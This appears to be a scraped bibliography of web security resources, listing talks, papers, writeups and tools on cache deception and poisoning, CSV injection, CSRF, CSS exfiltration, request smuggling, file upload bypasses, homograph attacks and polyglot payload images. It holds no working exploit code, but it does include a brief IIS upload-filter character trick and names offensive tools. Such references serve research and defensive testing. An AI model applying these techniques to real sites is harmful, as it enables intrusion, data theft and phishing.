- Web Cache Deception (WCD) has been introduced in 2017 by Omer Gil, where an intruder lures a caching server to mistakenly store private information publicly and as a result obtains unauthorized access to cached data. In this talk, we will introduce new exploitation techniques based on the semantic disconnect among different framework-independent web technologies (e.g., browsers, CDNs, web servers) which results in different URL path interpretations. We coined the term “Path Confusion” to represent this disagreement and we will present the effectiveness of this technique on WCD attack. In February 2020, our related research was voted and led to an award as the top web hacking technique of 2019 by PortSwigger. We explore WCD as an instance of the path confusion class of attacks, and demonstrate that variations on the path confusion technique make it possible to exploit sites that are otherwise not impacted by the original attack. Our findings show that many popular sites remain vulnerable three years after the public disclosure of WCD. To further elucidate the seriousness of path confusion, we will also present the large scale analysis results of WCD attack on high profile sites. We present a semi-automated path confusion crawler which detects hundreds of sites that are still vulnerable to WCD only with specific types of path confusion techniques. We conclude the talk with explaining why path confusion is so complicated to remediate while shedding light on potential areas that researchers and bughunters can apply new attack vectors through different path confusion techniques.
- Web Cache Deception Attack - Omer Gil(BHUSA 2017)
- Writeups
- Tools
- Web Cache Deception Burp Extension
- A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
- Web Cache Deception Burp Extension
- Web Cache Poisoining Attack
- 101
- HTTP Cache Poisoning via Host Header Injection - Carlos Bueno(2007)
- Web Cache Poisoning - 0xn3va
- Web cache poisoning - PortSwigger
- Practical Web Cache Poisoning: Redefining 'Unexploitable' - James Kettle(BHUSA2018)
- Slides
- Modern web applications are composed from a crude patchwork of caches and content delivery networks. In this session I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.
- Articles/Blogposts/Writeups
- Practical Web Cache Poisoning - James Kettle(2018/20)
- Bypassing Web Cache Poisoning Countermeasures - James Kettle(2018/20)
- Responsible denial of service with web cache poisoning - James Kettle(2019)
- CPDoS: Cache Poisoned Denial of Service
- Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle(2020)
- Web Cache Poisoning for Beginners(2020)
- Cache Poisoning at Scale - Youstin(2021)
- Talks/Presentations/Videos
- Tools
- Param-miner
- This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
- Param-miner
- 101
- See section of same name under the 'Privesc/PostEx - General' page.
- 101
- [Cell Injection] Attacking the end user through the application - David Stubley(2013)
- Comma Separated Vulnerabilities - James Kettle(2014)
- This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
- CSV injection: Basic to Exploit!!!! - Akansha Kesharwani(2017)
- Articles/Blogposts/Writeups
- From CSV to Meterpreter - XPNSec(2015)
- CSV Injection Revisited - Making Things More Dangerous(and fun) - Andy Gill(2016)
- The Absurdly Underestimated Dangers of CSV Injection - George Mauer(2017)
- CSV Injection- There's devil in the detail - Sunil Joshi(2017)
- Microsoft Excel CSV code execution/injection method - xor %eax,%eax(2017)
- From CSV to CMD to qwerty - exploresecurity(2019)
- Data Extraction to Command Execution CSV Injection - Jamie Rougvie(2019)
- CSV Injection Payload List - Ismail Tasdelen(2020)
- Everything about the CSV Excel Macro Injection - Ishaq Mohammed(2021)
- Talks & Presentations
- Tricks to improve web app excel export attacks(Slides) - Jerome Smith - CamSec2016
- Video
- This presentation is an embellished version of the second half of a talk originally presented at BSides MCR 2016. It covers more general web app export issues as well as revisions on the DDE content following feedback from BSides. This talk also had more demos.
- Tricks to improve web app excel export attacks(Slides) - Jerome Smith - CamSec2016
- Tools
- 101
- Clickjacking - Wikipedia
- Clickjacking (classified as a User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.
- Clickjacking Defense Cheat Sheet - OWASP
- This cheat sheet is intended to provide guidance for developers on how to defend against Clickjacking, also known as UI redress attacks.
- X-Frame-Options - MDN Web Docs
- Clickjacking (UI redressing) - PortSwigger
- Clickjacking - Wikipedia
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- Clickjacking Attacks and How to Prevent Them - Andrea Chiarelli(2020)
- A Tale of Two Headers: A Formal Analysis of Inconsistent Click-Jacking Protection on the Web - Stefano Calzavara, Sebastian Roth, Alvise Rabitti, Venezia; Michael Backes, Ben Stock(2020)
- Click-jacking protection on the modern Web is commonly enforced via client-side security mechanisms for framing control, like the X-Frame-Options header (XFO) and Content Security Policy (CSP). Though these client-side security mechanisms are certainly useful and successful, delegating protection to web browsers opens room for inconsistencies in the security guarantees offered to users of different browsers. In particular, inconsistencies might arise due to the lack of support for CSP and the different implementations of the underspecified XFO header. In this paper, we formally study the problem of inconsistencies in framing control policies across different browsers and we implement an automated policy analyzer based on our theory, which we use to assess the state of click-jacking protection on the Web. Our analysis shows that 10% of the (distinct) framing control policies in the wild are inconsistent and most often do not provide any level of protection to at least one browser. We thus propose recommendations for web developers and browser vendors to mitigate this issue. Finally, we design and implement a server-side proxy to retrofit security in web applications.
- Papers
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- HTML Form Protocol Attack - Jochen Topf(2001)
- This paper describes how some HTML browsers can be tricked through the use of HTML forms into sending more or less arbitrary data to any TCP port. This can be used to send commands to servers using ASCII based protocols like SMTP, NNTP, POP3, IMAP, IRC, and others. By sending HTML email to unsuspecting users or using a trojan HTML page, an attacker might be able to send mail or post Usenet News through servers normally not accessible to him. In special cases an attacker might be able to do other harm, e.g. deleting mail from a POP3 mailbox.
- Cross-Protocol Request Forgery - Tanner Prynn(2018)
- Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF) are two attackmethods that enable attackers to cross network boundaries in order to attack applications,but can only target applications that speak HTTP. Custom TCP protocols are everywhere:IoT devices, smartphones, databases, development software, internal web applications, andmore. Often, these applications assume that no security is necessary because they are onlyaccessible over the local network. This paper aims to be a definitive overview of attacksthat allow cross-protocol exploitation of non-HTTP listeners using CSRF and SSRF, and alsoexpands on the state of the art in these types of attacks to target length-specified protocolsthat were not previously thought to be exploitable.
- HTML Form Protocol Attack - Jochen Topf(2001)
- Presentations/Talks/Videos
- Tools
- Extract data
- Extract data is a demo combining a cross-protocol request attack with DNS rebinding
- Extract data
- 101
- Articles/Blogposts/Writeups
- Content-Type Blues - Neil Bergman
- Exploiting CVE-2011-2461 on google.com - Mauro Gentile
- Cross-Site Content (Data) Hijacking (XSCH) PoC Project
- Even uploading a JPG file can lead to Cross-Site Content Hijacking (client-side attack)! - Soroush Dalili
- Same Origin Policy Weaknesses - Kuza55
- The lesser known pitfalls of allowing file uploads on your website - Mathias Karlsson, Frans Rosén
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts
- ClientSideTrojan - zope.org(2000)
- Cross-Site Request Forgeries - Peter Watkins(Bugtraq 2002)](https://web.archive.org/web/20020204142607/http://www.tux.org/~peterw/csrf.txt)
- Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
- The OWASP Top Ten and ESAPI – Part 5 – Cross Site Request Forgery (CSRF)
- [Testing for CSRF (OTG-SESS-005) - OWASP](https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)\)
- JavaScript Hijacking - Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West(2007)
- A most Neglected Fact About CSRF - pdf
- Bypassing CSRF Protection - Vickie Li
- Samesite by Default and What It Means for Bug Bounty Hunters - Filedescriptor, Ron Chan & Edoverflow(2020)
- Cross Site Request Forgery: Techniques - OneHackMan(2019)
- CSRF is dead - Scott Helme(2017)
- CSRF is (really) dead - Scott Helme(2019)
- Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation - Billy K Rios, Raghav Dube(BHEU 2007)
- JSON CSRF with Parameter Padding - Gursev Kalra
- Cross-Site Request Forgery (CSRF) | Complete Guide - Rana Khalil(2021)
- In this video, we cover the theory behind Cross-Site Request Forgery (CSRF) vulnerabilities, how to find these types of vulnerabilities from both a white box and black box perspective, how to exploit them and how to prevent them.
- CSRF in YouTube Leanback API - xdavidhu(2021)
- The State of CSRF Vulnerability in 2022 - Utku Sen(2022)
- XSRFProbe
- The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.
- Writeups
- WordPress 5.1 CSRF to Remote Code Execution - Simon Scannell(2019)
- CSRF to RCE bug chain in Prestashop v1.7.6.4 and below - Sivanesh Ashok(2020)
- CSRF Protection Bypass in Play Framework - Luca Carrettoni(2020)
- Research: The mass CSRFing of .google.com/ products. - missoumsai.com
- Zoom Security Exploit – Cracking private meeting passwords - Tom Anthony(2020)
- Setting the ‘Referer’ Header Using JavaScript - Drew Kirkpatrick(2020)
- How I leveraged an interesting CSRF vulnerability to turn self XSS into a persistent attack? - Akash Methani(2020)
- Exploiting WebSocket [Application Wide XSS / CSRF] - Osama Avvan
- CSRF is No Joke: From CSRF to RCE in Cisco Energy Management - Chris Lyne
- From Csrf To Rce - fgsec.net(2020)
- From CSRF to RCE and WordPress-site takeover: CVE-2020-8417 - Jonas Lejon
- WordPress 5.1 CSRF + XSS + RCE – Poc - Pablo Plaza Martinez
- Bolt CMS <= 3.7.0 Multiple Vulnerabilities - CSRF to RCE - Sivanesh Ashok
- Playing with GZIP: RCE in GLPI (CVE-2020-11060) - @myst404
- Papers
- [Session Riding: A Widespread Vulnerability in Today's Web Applications - Thomas Schreiber(2004)(https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf)
- Robust Defenses for Cross-Site Request Forgery
- RequestRodeo: Client Side Protection against Session Riding - Martin Johns and Justus Winter - pdf
- Presentations/Talks/Videos
- Tools
- Onsite-Request-Forgery
- 101
- General
- Articles/Blogposts/Writeups
- I know where you've been - Jeremiah Grossman(2006)
- CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa(2015)
- CSS: Cascading Style Scripting - XSS Jigsaw(2015)
- History theft with CSS Boolean algebra - lcamtuf
- CSS mix-blend-mode is bad for your browsing history - lcamtuf(2016)
- Stealing Data With CSS: Attack and Defense - Mike Gualtieri(2018)
- Third party CSS is not safe - Jake Archibald(2018)
- CSS Security Vulnerabilities - Chris Coyier(2019)
- Cross-Origin CSS Attacks Revisited (feat. UTF-16) - @filedescriptor
- Talks/Presentations/Videos
- The Sexy Assassin: Tactical Exploitation Using CSS - G. Heyes, D. Lindsay, and E.V. Nava(BlueHat 2009)
- XSS. (No, the other "S") - Mike West(CSSconf.eu 2013)
- Attacking Rich Internet Applications - Stefano Di Paola, kuza55(25c3 2010)
- This presentation will examine the largely underresearched topic of rich internet applications (RIAs) security in the hopes of illustrating how the complex interactions with their executing environment, and general bad security practices, can lead to exploitable applications. In recent years rich internet applications (RIAs) have become the mainstay of large internet applications and are becoming increasingly attractive to the industry due to their similarity to desktop applications. Furthermore their user of exsting web technologies such as HTTP, HTML/XML and Javascript/Actionscript make them attractive options to companies with existing web developers. Unfortunately the use of existing technologies brings with it the burden of existing ways to write vulnerable code, but adds yet more ways. This presentation will examine the largely underresearched topic of RIA security in the hopes of illustrating how the complex interactions with their executing environment, and general bad security practices, can lead to exploitable applications.
- The Curse of Cross-Origin Stylesheets - LiveOverflow(2018)
- The Sexy Assassin Tactical Exploitation using CSS. - Gerardo Speaks
- Papers
- Scriptless Attacks - Stealing the Pie Without Touching the Sill - Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorsten Holz, Jörg Schwenk(2012)
- In this paper, we examine the attack surface that remainsafter XSS and similar scripting attacks are supposedly mit-igated by preventing an attacker from executing JavaScriptcode. We address the question of whether an attacker reallyneeds JavaScript or similar functionality to perform attacksaiming for information theft. The surprising result is thatan attacker can also abuse Cascading Style Sheets (CSS) incombination with other Web techniques like plain HTML,inactive SVG images or font files. Through several casestudies, we introduce the so calledscriptless attacksanddemonstrate that an adversary might not need to executecode to preserve his ability to extract sensitive informationfrom well protected websites. More precisely, we show thatan attacker can use seemingly benign features to build sidechannel attacks that measure and exfiltrate almost arbitrarydata displayed on a given website.We conclude this paper with a discussion of potential mit-igation techniques against this class of attacks. In addition,we have implemented a browser patch that enables a websiteto make a vital determination as to being loaded in a de-tached view or pop-up window. This approach proves usefulfor prevention of certain types of attacks we here discuss.
- Scriptless Attacks - Stealing the Pie Without Touching the Sill - Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorsten Holz, Jörg Schwenk(2012)
- Tools
- Articles/Blogposts/Writeups
- CSS Injection
- 101
- Articles/Blogposts/Writeups
- Stealing Secrets with CSS : Cross Origin CSS Attacks - Keith Makan(2016)
- Better Exfiltration via HTML Injection - d0nut(2019)
- CSS Injection Primitives - x-c3ll
- CSS data exfiltration in Firefox via a single injection point - Michal Bentkowski(2020)
- Unleashing the power of CSS injection: The access key to an internal API(2023)
- "In this write-up, we will be explaining a vulnerability that was discovered in an online accounting application. The vulnerability was a CSS injection flaw that could be exploited in the application’s PDF generator. We will explain to you how we discovered the vulnerability and how we were able to exploit it to get internal API access."
- Cross-origin pixel stealing: Timing attacks using CSS filters - Robert Kotcher, Yutong Pei, Pranjal Jumde, Collin Jackson
- Presentations/Talks/Videos
- Tools
- sic
- A tool to perform Sequential Import Chaining
- sic
- 101
- Articles/Blogposts/Presentations/Talks/Videos
- Security Testing HTML5 WebSockets - ethicalhack3r(2013)
- How Cross-Site WebSocket Hijacking could lead to full Session Compromise - notsosecure.com(2014)
- Analysing, Testing and Fuzzing WebSocket Implementations with IronWASP - ironwasp.org(2014)
- Cross-Site Websocket Hijacking (CSWSH) - Jesse Somerville(2019)
- Hacking WebSocket With Cross-Site WebSocket Hijacking attacks - Vickie Li(2019)
- Cross-site WebSocket hijacking (CSWSH) - HackTricks
- Talks/Presentations/Videos
- Papers
- Tools
- --> See XML section
- --> See 'CSV Injection' Attack
- Comma Separated Vulnerabilities
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Cache Me If You Can - Philippe Arteau
- Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking - Louis Dion-Marcil(BHUSA2018)
- Slides
- When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- APIs
- See api section
- HTTP * httpfuzz * httpfuzz is a fast HTTP fuzzer written in Go inspired by Burp Intruder. It takes a seed request and uses a wordlist to generate requests. For a wordlist with m words and a seed request with n injection points, httpfuzz will generate m * n requests. It can be used as a library, but is meant to be used with the included httpfuzz CLI. It allows fuzzing of HTTP requests with text bodies and multipart file uploads.
- Injection Vulns
- Papers
- Toss a Fault to Your Witcher: Applying Grey-box Coverage-Guided Mutational Fuzzing to Detect SQL and Command Injection Vulnerabilities - Erik Trickel, Fabio Pagani, Chang Zhu, Lukas Dresel†, Giovanni Vigna, Christopher Kruegel, Ruoyu Wang, Tiffany Bao, Yan Shoshitaishvili, Adam Doupé(2022)
- To overcome these limitations, we propose Witcher, a novel web vulnerability discovery framework that is inspired by grey-box coverage-guided fuzzing. Witcher implements the concept of fault escalation to detect both SQL and command injection vulnerabilities. Additionally, Witcher captures coverage information and creates output-derived input guidance to focus the input generation and, therefore, to increase the state-space exploration of the web appli- cation. On a dataset of 18 web applications written in PHP, Python, Node.js, Java, Ruby, and C, 13 of which had known vulnerabilities, Witcher was able to find 23 of the 36 known vulnerabilities (64%), and additionally found 67 previously unknown vulnerabilities, 4 of which received CVE numbers. In our experiments, Witcher outper- formed state of the art scanners both in terms of number of vulner- abilities found, but also in terms of coverage of web applications
- Toss a Fault to Your Witcher: Applying Grey-box Coverage-Guided Mutational Fuzzing to Detect SQL and Command Injection Vulnerabilities - Erik Trickel, Fabio Pagani, Chang Zhu, Lukas Dresel†, Giovanni Vigna, Christopher Kruegel, Ruoyu Wang, Tiffany Bao, Yan Shoshitaishvili, Adam Doupé(2022)
- Papers
- JSON
- Articles/Blogposts/Writeups
- Tools
- Regex
- Articles/Blogposts/Writeups
- REcollapse
- Blogpost
- REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications
- REcollapse
- Talks/Presentations
- ReDoSHunter: A Combined Static and Dynamic Approach for Regular Expression DoS Detection - Yeting Li and Zixuan Chen, Jialun Cao, Zhiwu Xu, Qiancheng Peng, Haiming Chen, Liyuan Chen, Shing-Chi Cheung(Usenix2021)
- Tool
- To address these two problems, we propose ReDoSHunter, a ReDoS-vulnerable regex detection framework that can ef- fectively pinpoint the multiple vulnerabilities in a vulnerable regex, and generate examples of attack-triggering strings. Re- DoSHunter is driven by five vulnerability patterns derived from massive vulnerable regexes. Besides pinpointing vulner- abilities, ReDoSHunter can assess the degree (i.e., exponential or polynomial) of the vulnerabilities detected. Our experi- ment results show that ReDoSHunter achieves 100% preci- sion and 100% recall in the detection of ReDoS-vulnerable regexes in three large-scale datasets with 37,651 regexes. It significantly outperforms seven state-of-the-art techniques. ReDoSHunter uncovered 28 new ReDoS-vulnerabilities in 26 well-maintained popular projects, resulting in 26 assigned CVEs and 2 fixes.
- ReDoSHunter: A Combined Static and Dynamic Approach for Regular Expression DoS Detection - Yeting Li and Zixuan Chen, Jialun Cao, Zhiwu Xu, Qiancheng Peng, Haiming Chen, Liyuan Chen, Shing-Chi Cheung(Usenix2021)
- Tools
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Homograph Attack - crypto-it.net
- What is an IDN Homograph Attack and How Do You Protect Yourself? - zvelo(2018)
- Phishing with Unicode Domains - Xudong Zheng(2017)
- Watch Your Step: The Prevalence of IDN Homograph Attacks - Asaf Nadler(2017)
- Homograph attacks: Don’t believe everything you see - Cecilia Pastorino(2017)
- A Quick Guide to the IDN Homograph Attack - Ronnie T. Baby
- Talks/Presentations/Videos
- Weaponizing Unicode Homographs Beyond IDNs - The Tarquin(DEFCON 26)
- Most people are familiar with homograph attacks due to phishing or other attack campaigns using Internationalized Domain Names with look-alike characters. But homograph attacks exist against wide variety of systems that have gotten far less attention. This talk discusses the use of homographs to attack machine learning systems, to submit malicious software patches, and to craft cryptographic canary traps and leak repudiation mechanisms. It then introduces a generalized defense strategy that should work against homograph attacks in any context.
- Weaponizing Unicode Homographs Beyond IDNs - The Tarquin(DEFCON 26)
- Papers
- Cutting through the Confusion: A Measurement Study of Homograph Attacks. - Tobias Holgers, David E. Watson, Steven D. Gribble(2006)
- Web homograph attacks have existed for some time, and the recent adoption of International Domain Names (IDNs) support by browsers and DNS registrars has exacerbated the problem [Gabr02]. Many international letters have similar glyphs, such as the Cyrillic letter P (lower case 'er,' Unicode 0x0440) and the Latin letter p. Because of the large potential for misuse of IDNs, browser vendors, policy advocates, and researchers have been exploring techniques for mitigating homograph attacks [=Mozi05, Appl05, Oper05, Mark05]. There has been plenty of attention on the problem recently, but we are not aware of any data that quantifies the degree to which Web homograph attacks are currently taking place. In this paper, we use a combination of passive network tracing and active DNS probing to measure several aspects of Web homographs. Our main findings are four-fold. First, many authoritative Web sites that users visit have several confusable domain names registered. Popular Web sites are much more likely to have such confusable domains registered. Second, registered confusable domain names tend to consist of single character substitutions from their authoritative domains, though we saw instances of five-character substitutions. Most confusables currently use Latin character homographs, but we did find a non-trivial number of IDN homographs. Third, Web sites associated with non-authoritative confusable domains most commonly show users advertisements. Less common functions include redirecting victims to competitor sites and spoofing the content of authoritative site. Fourth, during our nine-day trace, none of the 828 Web clients we observed visited a non-authoritative confusable Web site. Overall, our measurement results suggest that homograph attacks currently are rare and not severe in nature. However, given the recent increases in phishing incidents, homograph attacks seem like an attractive future method for attackers to lure users to spoofed sites.
- Іntеrnɑtⅰonɑlⅰzеⅾ Dоmɑⅰn Nɑmе Hоmоɡrɑρh Attɑсκ - Chen Lai, Zhongrong Jian, J. Sidrach
- ShamFinder: An Automated Framework for Detecting IDN Homographs - Hiroaki Suzuki, Daiki Chiba, Yoshiro Yoneya, Tatsuya Mori, Shigeki Goto
- Cutting through the Confusion: A Measurement Study of Homograph Attacks. - Tobias Holgers, David E. Watson, Steven D. Gribble(2006)
- Tools
- EvilURL v2.0
- Generate unicode evil domains for IDN Homograph Attack and detect them.
- homoglyphs.net
- Punycode converter
- or an IDN converter, a tool for Punycode to Text/Unicode and vice-versa conversion
- EvilURL v2.0
- 101
- Articles/Blogposts/Writeups
- Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP
- Insecure Direct Object Reference Prevention Cheat Sheet - OWASP
- Airbnb – Web to App Phone Notification IDOR to view Everyone’s Airbnb Messages - Brett Buerhaus
- How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - BugCrowd
- A Less Known Attack Vector, Second Order IDOR Attacks - Ozgur Alp(2020)
- Automated IDOR Discovery through Stateful Swagger Fuzzing - Aaron Loo(2020)
- Finding more IDORs – Tips and Tricks - Max Cobridge(2021)
- Talks/Presentations/Videos
- Tools
- Execution After Redirect
- Open Redirect
- 101
- Articles/Blogposts/Writeups
- Why File Upload Forms are a Major Security Threat - acunetix
- Unrestricted File Upload Testing
- BookFresh Tricky File Upload Bypass to RCE - secgeek.net
- Ability to upload HTML via SRT caption files for Facebook Videos - philippeharewood.com(2015)
- 15 Technique to Exploit File Upload Pages - Ebrahim Hegazy(HackIT17)
- File Upload and PHP on IIS:
>=?
and<=*
and"=.
- Soroush Dalili - Exploiting File Uploads Pt. 1 – MIME Sniffing to Stored XSS #bugbounty - HackerOnTwoWheels(2019)
- Bypassing file upload filter by source code review in Bolt CMS - Sivanesh Ashok
- File Upload Testing tips - HolyBugx
- File upload tricks and checklist - Gus Ralph(2021)
- A New Vector For “Dirty” Arbitrary File Write to RCE - Maxence Schmitt, Lorenzo Stella(2023)
- Papers
- Presentations/Talks/Videos
- FUSE: Finding File Upload Bugs via Penetration Testing - Taekjin Lee, Seongil Wi, Suyoung Lee, Sooel Son(NDSS2020)
- An Unrestricted File Upload (UFU) vulnerability is a critical security threat that enables an adversary to upload her choice of a forged file to a target web server. This bug evolves into an Unrestricted Executable File Upload (UEFU) vulnerability when the adversary is able to conduct remote code execution of the uploaded file via triggering its URL. We design and implement FUSE, the first penetration testing tool designed to discover UFU and UEFU vulnerabilities in server-side PHP web applications. The goal of FUSE is to generate upload requests; each request becomes an exploit payload that triggers a UFU or UEFU vulnerability. However, this approach entails two technical challenges: (1) it should generate an upload request that bypasses all content-filtering checks present in a target web application; and (2) it should preserve the execution semantic of the resulting uploaded file. We address these technical challenges by mutating standard upload requests with carefully designed mutation operations that enable the bypassing of content- filtering checks and do not tamper with the execution of uploaded files. FUSE discovered 30 previously unreported UEFU vulnerabilities, including 15 CVEs from 33 real-world web applications, thereby demonstrating its efficacy in finding code execution bugs via file uploads.
- Paper
- Finding File Upload Bugs via Penetration Testing - Taekjin Lee, Seongil Wi, Suyoung Lee, Sooel Son(2020)
- Paper
- An Unrestricted File Upload (UFU) vulnerability is a critical security threat that enables an adversary to upload her choice of a forged file to a target web server. This bug evolves into an Unrestricted Executable File Upload (UEFU) vulnerability when the adversary is able to conduct remote code execution of the uploaded file via triggering its URL. We design and implement FUSE, the first penetration testing tool designed to discover UFU and UEFU vulnerabilities in server-side PHP web applications. The goal of FUSE is to generate upload requests; each request becomes an exploit payload that triggers a UFU or UEFU vulnerability. However, this approach entails two technical challenges: (1) it should generate an upload request that bypasses all content-filtering checks present in a target web application; and (2) it should preserve the execution semantic of the resulting uploaded file. We address these technical challenges by mutating standard upload requests with carefully designed mutation operations that enable the bypassing of content- filtering checks and do not tamper with the execution of uploaded files. FUSE discovered 30 previously unreported UEFU vulnerabilities, including 15 CVEs from 33 real-world web applications, thereby demonstrating its efficacy in finding code execution bugs via file uploads.
- FUSE: Finding File Upload Bugs via Penetration Testing - Taekjin Lee, Seongil Wi, Suyoung Lee, Sooel Son(NDSS2020)
- Tools
- Anti Malware Testfile - EICAR
- fuxploider
- File upload vulnerability scanner and exploitation tool.
- 101
- Articles/Blogposts/Writeups
- Tools
- 101
- HTTP request smuggling - Wikipedia
- HTTP request smuggling is a security exploit on the HTTP protocol that uses inconsistency between the interpretation of Content-length and/or Transfer-encoding headers between HTTP server implementations in an HTTP proxy server chain. It was first documented in 2005, and was again repopularized by PortSwigger's research.
- HTTP request smuggling - Portswigger
- HTTP Desync Attacks: Request Smuggling Reborn - James Kettle
- ‘HTTP Request Smuggling’ - Securiteam
- Help you understand HTTP Smuggling in one article - @ZeddYu_Lu
- Request Smuggling 101 - Philippe Arteau(2021)
- HTTP request smuggling - Wikipedia
- Articles/Blogposts/Writeups
- Checking HTTP Smuggling issues in 2015 - Part1 - RBleug(2015)
- Hiding in plain sight: HTTP request smuggling - Travis Isaacson(2020)
- Demystifying HTTP request smuggling - Sam Sanoop
- NGINX error_page request smuggling - Bert JW Regeer, Francisco Oca Gonzalez(2019)
- HTTP Request Smuggling + IDOR - hipotermia(2019)
- The Powerful HTTP Request Smuggling 💪 - Ricardo Iramar dos Santos
- "TL;DR: This is how I was able to exploit a HTTP Request Smuggling in some Mobile Device Management (MDM) servers and send any MDM command to any device enrolled on them for a private bug bounty program."
- h2c Smuggling: Request Smuggling Via HTTP/2 Cleartext (h2c) - Jake Miller(2020)
- HTTP Request Smuggling – 5 Practical Tips - Pieter Hiele(2020)
- XXE-scape through the front door: circumventing the firewall with HTTP request smuggling - Pieter Hiele(2020)
- Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond - Daniel Thatcher(2020)
- Account takeover via HTTP Request Smuggling - hipotermia(2020)
- HTTP Request Smuggling Workshop - Philippe Arteau
- HTTP Request Smuggling via higher HTTP versions - Emil Lerner(2021)
- Performing
- A Pentester’s Guide to HTTP Request Smuggling - Bursa Demir(2020)
- Smuggling HTTP headers through reverse proxies - Robin Verton(2020)
- HTTP Request Smuggling: Abusing Reverse Proxies - Christopher Elgee(2020)
- WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour - Soroush Dalili(2018)
- Papers
- Presentations/Talks/Videos
- HTTP Desync Attacks: Smashing into the Cell Next Door - James Kettle(DEFCON27)
- HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $50k in bug bounties. Using these targets as case studies, I’ll show you how to delicately amend victim's requests to route them into malicious territory, invoke harmful responses, and lure credentials into your open arms. I’ll also demonstrate using backend reassembly on your own requests to exploit every modicum of trust placed on the frontend, gain maximum privilege access to internal APIs, poison web caches, and compromise my favourite login page. Although documented over a decade ago, a fearsome reputation for difficulty and collateral damage has left this attack optimistically ignored for years while the web's susceptibility grew. By applying fresh ideas and new techniques, I’ll unveil a vast expanse of vulnerable systems ranging from huge content delivery networks to bespoke backends, and ensure you leave equipped to devise your own desync techniques and tailor attacks to your target of choice.
- Hiding Wookiees in HTTP: HTTP smuggling - regilero(Defcon24)
- HTTP is everywhere, everybody wants to write an HTTP server. So I wrote mine :-) But mine not fast, and come with an HTTP client which sends very bad HTTP queries. My tool is a stress tester for HTTP servers and proxies, and I wrote it because I found flaws in all HTTP agents that I have checked in the last year i.e. nodejs, golang, Apache httpd, FreeBSD http, Nginx, Varnish and even Haproxy. This presentation will try to explain how flaws in HTTP parsers can be exploited for bad things; we'll play with HTTP to inject unexpected content in the user browser, or perform actions in his name. If you know nothing about HTTP it should be understandable, but you'll have to trust me blindly at the end. If you think you know HTTP, you have no reason to avoid this talk. Then, the short part, I will show you this new Open Source stress tool that I wrote and hope that you will remember it when you'll write your own HTTP parser for you new f** language.
- Practical Attacks Using HTTP Request Smuggling - @defparam(NahamCon2020)
- HTTP Request Smuggling in 2020 – New Variants, New Defenses and New Challenges - Amit Klein(BHUSA2020)
- HTTP Request Smuggling (AKA HTTP Desyncing) is an attack technique invented in 2005 that exploits different interpretations of a stream non-standard HTTP requests among various HTTP devices between the client (attacker) and the server (including the server itself). It can be used to smuggle requests across WAFs and security solutions, poison HTTP caches, inject responses to users and hijack user requests.
- HTTP Request Smuggling in 2020 – New Variants, New Defenses and New Challenges - Amit Klein(BHUSA2020)
- HTTP Desync Attack Explained With Paper - LiveUnderflow(2021)
- HTTP Desync Attacks: Smashing into the Cell Next Door - James Kettle(DEFCON27)
- Tools
- Smuggler
- An HTTP Request Smuggling / Desync testing tool written in Python 3
- HTTPWookie
- HTTPWookiee is an HTTP server and proxy stress tool (respect of RFC, HTTP Smuggling issues, etc). If you run an HTTP server project contact me for private repository access with more tests.
- smuggler.py
- Smuggler
- 101
- Articles/Blogposts/Writeups
- Revisiting XSS payloads in PNG IDAT chunks - Adam Logue
- An XSS on Facebook via PNGs & Wonky Content Types - jack@whitton.io
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts
- Bypassing CSP using polyglot JPEGs - Gareth Heyes
- Hacking group using Polyglot images to hide malvertising attacks - Josh Summit
- BMP/x86 Polyglot - steiner@warroom.securestate
- Upload a web.config File for Fun & Profit - Soroush Dalili
- Uploading web.config for Fun and Profit 2 - Soroush Dalili
- Encoding Web Shells in PNG IDAT chunks - phil
- Tools
- xss2png
- A simple tool to generate PNG images with XSS payloads stored in PNG IDAT chunks
- pixload
- Set of tools for creating/injecting payload into images.
- PNG-IDAT-Payload-Generator
- Generate a PNG with a payload embedded in the IDAT chunk (Based off of previous concepts and code -- credit in README)
- Imagecreatefromgif-Bypass
- xss2png
- 101
